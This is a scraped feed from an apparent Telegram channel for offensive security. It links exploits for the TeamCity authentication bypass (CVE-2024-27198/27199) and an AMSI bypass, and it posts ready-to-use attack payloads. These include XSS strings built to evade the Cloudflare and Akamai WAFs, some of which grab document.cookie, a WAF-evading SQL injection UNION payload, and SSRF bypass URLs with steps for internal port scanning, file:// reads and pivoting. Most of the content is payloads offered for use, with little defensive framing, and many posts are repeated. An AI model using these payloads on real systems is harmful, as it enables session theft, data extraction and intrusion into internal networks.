TeamCity
CVE-2024-27198 & CVE-2024-27199 TeamCity Authentication Bypass
LearnBox:
1_Exploits
2_Video
#CVE #Bug #Authentication #Bypass
➖➖➖➖➖➖➖
📣 T.me/LearnExploit
📣 T.me/BugCod3
CVE-2024-27198 & CVE-2024-27199 TeamCity Authentication Bypass
LearnBox:
1_Exploits
2_Video
#CVE #Bug #Authentication #Bypass
➖➖➖➖➖➖➖
📣 T.me/LearnExploit
📣 T.me/BugCod3
👍8🔥6👎3
Nice collection of XSS filters bypasses 💎
Github
#Bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Bypass #xss
——————
0Day.Today
@LearnExploit
@Tech_Army
❤3👍2❤🔥1
Stored Xss payload 🔥
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload for bypass waf:
<Img Src=OnXSS OnError=confirm("@Learnexploit")>
#xss #Bypass #WAF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡5
Xss Payload
<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
<A HRef=\" AutoFocus
OnFocus=top/**/?.['al'%2B'ert'](1)>
#xss #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥4👍1
Writeup: 23000$ for Authentication Bypass & File Upload & Arbitrary File Overwrite
Link
#Writeup #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
#Writeup #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
👍7
CloudFlare XSS protection WAF Bypassed 💎
#WAF #XSS #Bypass #CloudFlare
——————
0Day.Today
@LearnExploit
@Tech_Army
<Img Src=OnXSS OnError=confirm(document.cookie)>#WAF #XSS #Bypass #CloudFlare
——————
0Day.Today
@LearnExploit
@Tech_Army
👍6❤2⚡1
Bypassed strong Akamai WAF
payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
#Waf #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
payload: '"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
#Waf #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥3🔥1
"AMSI WRITE RAID" Vulnerability that leads to an effective AMSI BYPASS
Github
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥5👎2
payload to bypass Akamai WAF
#WAF #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
?foobar=<foo%20bar=%250a%20onclick=<your js code>#WAF #Bypass #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3👎1
Sql injection Manual Bypass WAF
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
Payload :
'AND+0+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-
#sql_injection #Bypass #WAF
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥7👍2👎2❤1😁1
A Cloudflare WAF bypass combining simple (but efficient) tricks
A payload with some obfuscation & filter evasion tricks
#CF #WAF #Bypass #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
📣 T.me/BugCod3
📣 T.me/LearnExploit
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1>`A payload with some obfuscation & filter evasion tricks
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>#CF #WAF #Bypass #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4⚡3🔥2👍1
SSRF Payloads To Bypass Firewall
Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):
http://127.127.127.127
http://127.0.0.0
http://127.1
http://0
http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3
http://127.1.1.1:80\@127.2.2.2:80/
http://[::1:80/
http://0000::1:80/
Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:
Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.
For example:
We discover that the following URL works:
We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network
#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
Here are 5 payloads that could be used for bypassing defenses when it comes to SSRF (Server-Side Request Forgery):
1) Bypass SSRF with CIDR:http://127.127.127.127
http://127.0.0.0
2) Bypass using rare address:http://127.1
http://0
3) Bypass using tricks combination:http://1.1.1.1 &Q2.2.2.2# @3.3.3.3/ urllib : 3.3.3.3
4) Bypass against a weak parser:http://127.1.1.1:80\@127.2.2.2:80/
5) Bypass localhost with [:]:http://[::1:80/
http://0000::1:80/
Let's remind ourselves what SSRF vulnerabilities are and what can we do with them. In general, SSRF allows us to:
Access services on the loopback interface running on the remote server. Scan internal network an potentially interact with the discovered services
Read local files on the server using file:// protocol handler
Move laterally / pivoting into the internal environment
How to find SSRF? When the target web application allows us to access external resources, e.g. a profile image loaded from external URL (running on a 3rd party website), we can try to load internal resources accessible by the vulnerable web application.
For example:
We discover that the following URL works:
https://example.com: 8000/page?
user=&link=https://127.0.0.1:8000
We can then run Intruder attack (Burp Suite) trying different ports, effectively doing a port scan of the host. We can also try to scan private IPs such as 192.168.x.x and discover alive IPs in the internal network
#SSRF #Bypass #Waf #Firewall #Payload #exploit #Xploit
〰️〰️〰️〰️〰️〰️〰️〰️
IR0Day.Today Bax
@LearnExploit
👍3💔3